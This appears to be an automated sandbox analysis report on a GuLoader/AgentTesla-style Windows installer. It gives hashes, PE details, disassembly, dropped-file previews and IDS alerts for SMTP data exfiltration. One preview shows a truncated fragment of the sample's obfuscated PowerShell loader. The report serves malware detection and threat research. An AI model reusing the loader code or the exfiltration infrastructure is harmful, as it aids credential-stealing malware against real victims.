                                                                                              37f463bf4616ecd445d4a1937da06e19Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              LqtjSIsoCg.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              5jh97SOa7H.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              ImDbHt7AA4.exeGet hashmaliciousDarkCloudBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              HATCH COVER REQ_AW24 New Order Request.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              EL GINER.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              rFactura02Presupuesto_9209Urbia_pdf_.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 142.250.185.193
                                                                                              • 216.58.206.46
                                                                                              No context
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):14744
                                                                                              Entropy (8bit):4.992175361088568
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                              MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                              SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                              SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                              SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Users\user\Desktop\ulf4JrCRk2.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1364950
                                                                                              Entropy (8bit):4.01596624783414
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:RUXf2bA7Qhduz3IlubXO2cabU5YpEhLR659UbGM:kUhUz3fO2yl89Ubn
                                                                                              MD5:B15E100E9C866F683BF95DB114620042
                                                                                              SHA1:FF1A4A98FB030DE62A0F1AAD24C6F534E76AC892
                                                                                              SHA-256:144180F59D06AC3935519D7159AB9ACFE85D7F6C9A70F0CA58B5132A32DFF8A7
                                                                                              SHA-512:BE25270D5C093F9FDEEB03C1D0DB3449536D409C719A7A3B7A2CEA4EC9C4F0A3E1658509127C1F75D8EEADF9C9C1996D3E5607AAB85AC4977E9CA3E822AFA089
                                                                                              Malicious:false
                                                                                              Preview:\.......,.......................................\...........................................................................................................................................................................................................................................J...Z...............j..............................................................................................................................................."...0...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\ulf4JrCRk2.exe
                                                                                              File Type:ASCII text, with very long lines (4071), with CRLF, LF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):74361
                                                                                              Entropy (8bit):5.139691996852477
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:3RoLfsJqYSdQi9UVJ317waflwDB6ABq6Ic:3RoQJSQi9UVp17xaBXAA
                                                                                              MD5:0C815073424B00B92FC425368C6F7131
                                                                                              SHA1:3D1D9EBF91B36AF214735949192D6155005D17F1
                                                                                              SHA-256:9680749A477B196DBC127709BCF3C0BC2BA2CD2EF3B1D81F3BADC0E2FD1FBCDF
                                                                                              SHA-512:009D9D4574039AE8A5852E0D2EED1844D106274508C0365E04D22394507ADBF1CCBCA6D5FBD30740BCD9125397BC57F2D643F512F8D0D5F85FE1A673791A2D3A
                                                                                              Malicious:false
                                                                                              Preview:$Gruedes=$Specificize;..<#Supersubtilized Klumperne Animistiske Necessities Natt uniniquitousness Vaarbebudere #>..<#Supranaturalistic Tesvino postulatet Salmedigtningerne Nonlabeling #>..<#Duckiest Udskaenkedes Fatalismen Eyeholes Tandplejerne Dehiscing #>..<#Rygraden Outpromise Patriarkatet Superclean #>..<#Isotropies Rederier Gryden Romanbladsstilens Ddshjlpens Oversets Moonlit #>..<#thirsters Spejldren Sygdomsramte Mrkvrdigstes Berringspunkterne #>...$Prestandardization = @'.Kreditf.Jabarit$Crossb fEr cssorSolaries SmukketBogtroteFideikoh.ernbanaFindyrkaVisceronfiscalsdGallo hs DecumbfHeath,ookonge.mrDarwinikHave,aalCheeryfaForeprorF selstiInd ildn ,melteg Onestesafgifts=Offende$MohammeNColpopleArtworktgalva.ovErhvervrReseg.ekPasquins GaleeulAdultersAzogalln NewtoniT stausermercingMaalspreafhndelrSpge se; Aftesd.PardonnfNaillesu.rebogsnFetidsvcSuperthtAfkommei RiverloTurbiteninterna loshedYPeg suseunbooklai,dfross DestiltAnthropy Genu.s Blokb (Steiner$ShrievaPOutwoessAmplitue Def
                                                                                              Process:C:\Users\user\Desktop\ulf4JrCRk2.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):395975
                                                                                              Entropy (8bit):7.668649303851621
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:0UXf2bA7Qhduz3IlubXO2cabU5YpEhLR6C:hUhUz3fO2ylT
                                                                                              MD5:9932684265774F8D8F1E0EDE73C93A94
                                                                                              SHA1:40C42BB51ADB70F3225EC91AA66C954CF6629607
                                                                                              SHA-256:4D05D20984F566FA5E3741D3A0565E294D98416F78CFFC819FBA000D7259CBFC
                                                                                              SHA-512:D889DD59CB51500BC17B9F81BA1BE5CAB98A9CE8A10E15A1CE374639B6F572738E1DF7360582E160A5A876BF5F301403CC7C937D639A1C7E7FB8DFC4BC65F2D3
                                                                                              Malicious:false
                                                                                              Preview:.......?.|....dd.aa.#.................!!!....+................1........777........!!!..........?......RRR...........PP..........'.99............................ ....H....!!!!.......pp...=.4.].................(..Z.hhhhh..A..........N.........6.....B......k...s....f............W................................eeee.S.....H........w...N....DD...............L..//..JJJJ..........................8.............................LLL............G..xx.........................XXX..........7......>>>...$$$$.\\........Q.............rr.....AA......zzzzzz..m...............'...;.\.}..PPP..}._.............k..............X.................::.z...V..99...ss.........................8.PP............55........p.........................CC.....DDD.....................ff.fff.........t...O.........7..h.......```.wwwwwwwww....|............eee.................]..xxxx.....T..@.....yyyyyyyy.............__.\.............G.....OOO............................;.......................p...GGG....................\\..G.n.....
                                                                                              Process:C:\Users\user\Desktop\ulf4JrCRk2.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):401
                                                                                              Entropy (8bit):4.3081571951748
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:Qz1k+ipwZQRjLDgRuJO6LfZ+3eoaaXxZ4lDvxFJoAc4SKpr7l1zR8xWtn:g7SwZAgRuJ7LQ3eolsDvxvoAyCzRyWt
                                                                                              MD5:3CCD7CE3AEADE62D54268376DE39516D
                                                                                              SHA1:3A6C81F87F5DFFC16D6F83B80BACB7986F449A92
                                                                                              SHA-256:923C9A43BB424B083E8C9F4AF6D7542DFD314DE4774CFA4A2C02078A8824F870
                                                                                              SHA-512:641B40048461820C1B6708662EB89B3C814EB9D81C02407074439253B908F9B706A58F416103093D45181D3A1A79976ED2B317B8B107A16C83346693357B3717
                                                                                              Malicious:false
                                                                                              Preview:coverable overboernes rederiernes malta hash sigbrandt penaria..hypocaust vindjakker residensen faglig inspire fossulate.hospitalmen kalvis chunk enantiopathia lkapsler fremkalde yeo brumbasserne..udnvnelsers aandeverdens staidness lsningsmodel rumfartscentres sedimenteres skalaindkomst..wotted intracollegiate baccharoid markswomen fip,skrivelinje laputically luftfarts doublelunged vestal isthmist.
                                                                                              Process:C:\Users\user\Desktop\ulf4JrCRk2.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):489222
                                                                                              Entropy (8bit):1.2506752052648178
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:KRRhfB9L9tO+zdfjXM6/cCVa5RrtfOvY0tl:O/9oQzM+vutfOQY
                                                                                              MD5:4D738E5B430D2DA5F5440BFBA5E0C83C
                                                                                              SHA1:3B73C8D8E4291DE2C588D56F6B0911D068B27363
                                                                                              SHA-256:67733DF8EAC8617D961458E56C3D8D7265F26519D4E50AF7FA62C081363E50CE
                                                                                              SHA-512:F14D6BC66B42591EDD5CAC6D80583C22F49484EDDE03CBC19616DE5E2F279479FD5D6CD0C8A76BAFB645178BD964A17E91EBCAA050F06818C1000FCE7712C8C0
                                                                                              Malicious:false
                                                                                              Preview:.....:...........................................8..........`.............Y...'............................................................................................8..................................................................................................K..........................................................P....................................................................................t.........r.............j...................................................................................................................................................................................m.............................................]......................d~...o.......R..............M................................................................._.......................................m................................................K...................................&.................V.......Q...............o....................................]........./....
                                                                                              Process:C:\Users\user\Desktop\ulf4JrCRk2.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):397443
                                                                                              Entropy (8bit):1.2507334034977688
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rutC7/xNChL15JkoO+lJmgozzros+eJn+GYSNODnOaFm3FU4lEQ08aWEwPCWDTLH:DKytNBgY6Q8JMdL4xiMp/7Cgvsww1I8
                                                                                              MD5:52277EFB876A67F81E5C8478D30F0940
                                                                                              SHA1:12B0B6D0DED14774C04AE561947C5F99F8046AF8
                                                                                              SHA-256:3688D48D11BB36B7C25270DE4B4D3C04181121AFCAFFD52A9F9C3FE7B69A2D42
                                                                                              SHA-512:356CD3B38AEC9B8AE7D831921A2BE60E80983F242D0E9DBBD60AE3CAB4A63DBFD35F12EC055975046070BABD71D847C0A2AD4578D02E845D0753BF7FF56C57E6
                                                                                              Malicious:false
                                                                                              Preview:..l........................I.............x...............X...................................9...............................................o....................'..................\........v..............................................................B...................................E.....................................e.......................................M.....v............r..(.........................................................................................,..)..............................#...T.................................M..................................+v...E..............?...............?..............d...................................U.............`.............*..........................................o.....s...........................................................................................................7..y......a........................................................................a.......................................................X.
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.674157022598364
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:ulf4JrCRk2.exe
                                                                                              File size:748'528 bytes
                                                                                              MD5:a8a9f68888009bf9737238846f3b6ec3
                                                                                              SHA1:328fc40462eca7d498bfe67b17a01a1ff009796b
                                                                                              SHA256:26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c
                                                                                              SHA512:a77cd1aa5d16e0747afdbd5a7d256520076d9e8a18927c367254f8de85490872e1d97307f93b407f04893f5414534f691394b1ba45ae3d6c36fb8eda3d4aebb8
                                                                                              SSDEEP:12288:8KzIabEV5n4lymBGY1FXYxV6eIrWgVHlDL/eM0fyQCx:8KzIcEc7Bt1gV6FVwYx
                                                                                              TLSH:D3F4F192F2C169DBC48256B985B9D730007F9F80662D066E3649793D9FB23006AC7FDB
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@
                                                                                              Icon Hash:7d4d4dd45f59ec13
                                                                                              Entrypoint:0x403217
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x54336EB1 [Tue Oct 7 04:40:17 2014 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN="Aldres Paakendelsens ", E=rdbedens@Foreller.Su, L=Pipriac, S=Bretagne, C=FR
                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                              Error Number:-2146762487
                                                                                              Not Before, Not After
                                                                                              • 24/05/2024 04:56:26 24/05/2027 04:56:26
                                                                                              Subject Chain
                                                                                              • CN="Aldres Paakendelsens ", E=rdbedens@Foreller.Su, L=Pipriac, S=Bretagne, C=FR
                                                                                              Version:3
                                                                                              Thumbprint MD5:44496AA563AC7865B0BE61FFDAFACCF3
                                                                                              Thumbprint SHA-1:49D174754FBD230609EE4A19CA5DA566C6025CE4
                                                                                              Thumbprint SHA-256:7DE023652651A9A01E3B7F3406EAB3DA91DD2EBDAF886F1FEF0A41AF6EDE7577
                                                                                              Serial:188FEAED300598C1C64FBA42DB3B7B0BA158602F
                                                                                              Instruction
                                                                                              sub esp, 00000184h
                                                                                              push ebx
                                                                                              push ebp
                                                                                              push esi
                                                                                              xor ebx, ebx
                                                                                              push edi
                                                                                              mov dword ptr [esp+18h], ebx
                                                                                              mov dword ptr [esp+10h], 00409130h
                                                                                              mov dword ptr [esp+20h], ebx
                                                                                              mov byte ptr [esp+14h], 00000020h
                                                                                              call dword ptr [00407034h]
                                                                                              push 00008001h
                                                                                              call dword ptr [004070B4h]
                                                                                              push ebx
                                                                                              call dword ptr [0040728Ch]
                                                                                              push 00000009h
                                                                                              mov dword ptr [004237B8h], eax
                                                                                              call 00007FAE707CC6B5h
                                                                                              mov dword ptr [00423704h], eax
                                                                                              push ebx
                                                                                              lea eax, dword ptr [esp+38h]
                                                                                              push 00000160h
                                                                                              push eax
                                                                                              push ebx
                                                                                              push 0041ECB8h
                                                                                              call dword ptr [00407164h]
                                                                                              push 004091E4h
                                                                                              push 00422F00h
                                                                                              call 00007FAE707CC35Fh
                                                                                              call dword ptr [004070B0h]
                                                                                              mov ebp, 00429000h
                                                                                              push eax
                                                                                              push ebp
                                                                                              call 00007FAE707CC34Dh
                                                                                              push ebx
                                                                                              call dword ptr [00407118h]
                                                                                              cmp byte ptr [00429000h], 00000022h
                                                                                              mov dword ptr [00423700h], eax
                                                                                              mov eax, ebp
                                                                                              jne 00007FAE707C98FCh
                                                                                              mov byte ptr [esp+14h], 00000022h
                                                                                              mov eax, 00429001h
                                                                                              push dword ptr [esp+14h]
                                                                                              push eax
                                                                                              call 00007FAE707CBDDDh
                                                                                              push eax
                                                                                              call dword ptr [00407220h]
                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                              jmp 00007FAE707C99B5h
                                                                                              cmp cl, 00000020h
                                                                                              jne 00007FAE707C98F8h
                                                                                              inc eax
                                                                                              cmp byte ptr [eax], 00000020h
                                                                                              je 00007FAE707C98ECh
                                                                                              Programming Language:
                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x28500.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xb62680x988
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x5bf40x5c0092032f5e50e74fe0fe80a33ba4ca92dbFalse0.6700067934782609data6.478210757314278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x70000x11ce0x12005801d712ecba58aa87d1e7d1aa24f3aaFalse0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x90000x1a7f80x400f2470ac8847791744aff280e7e2f5353False0.615234375data5.025395707292401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .ndata0x240000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x370000x285000x286008fe3eeefdb70a69775e0275630c876e7False0.33500024187306504data5.364335686193679IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x373580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.27695788477463623
                                                                                              RT_ICON0x47b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.34693609417700233
                                                                                              RT_ICON0x510280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.38391866913123845
                                                                                              RT_ICON0x564b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3682687765706188
                                                                                              RT_ICON0x5a6d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4352697095435685
                                                                                              RT_ICON0x5cc800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4899155722326454
                                                                                              RT_ICON0x5dd280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.601639344262295
                                                                                              RT_ICON0x5e6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6870567375886525
                                                                                              RT_DIALOG0x5eb180x140dataEnglishUnited States0.46875
                                                                                              RT_DIALOG0x5ec580x11cdataEnglishUnited States0.6056338028169014
                                                                                              RT_DIALOG0x5ed780xc4dataEnglishUnited States0.5918367346938775
                                                                                              RT_DIALOG0x5ee400x60dataEnglishUnited States0.7291666666666666
                                                                                              RT_GROUP_ICON0x5eea00x76dataEnglishUnited States0.7542372881355932
                                                                                              RT_VERSION0x5ef180x2e0dataEnglishUnited States0.48777173913043476
                                                                                              RT_MANIFEST0x5f1f80x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                              DLLImport
                                                                                              KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                                                              USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-11-05T16:09:44.203457+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.949933208.91.199.223587TCP
                                                                                              2024-11-05T16:09:44.203457+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.949933208.91.199.223587TCP
                                                                                              2024-11-05T16:10:05.747802+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949795TCP
                                                                                              2024-11-05T16:10:30.808031+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.949933208.91.199.223587TCP
                                                                                              2024-11-05T16:10:30.808031+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949933208.91.199.223587TCP
                                                                                              2024-11-05T16:10:43.237145+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949977TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 5, 2024 16:10:20.382661104 CET49879443192.168.2.9216.58.206.46
                                                                                              Nov 5, 2024 16:10:20.382707119 CET44349879216.58.206.46192.168.2.9
                                                                                              Nov 5, 2024 16:10:20.382778883 CET49879443192.168.2.9216.58.206.46
                                                                                              Nov 5, 2024 16:10:20.397202969 CET49879443192.168.2.9216.58.206.46
                                                                                              Nov 5, 2024 16:10:20.397213936 CET44349879216.58.206.46192.168.2.9
                                                                                              Nov 5, 2024 16:10:21.265965939 CET44349879216.58.206.46192.168.2.9
                                                                                              Nov 5, 2024 16:10:21.266052008 CET49879443192.168.2.9216.58.206.46
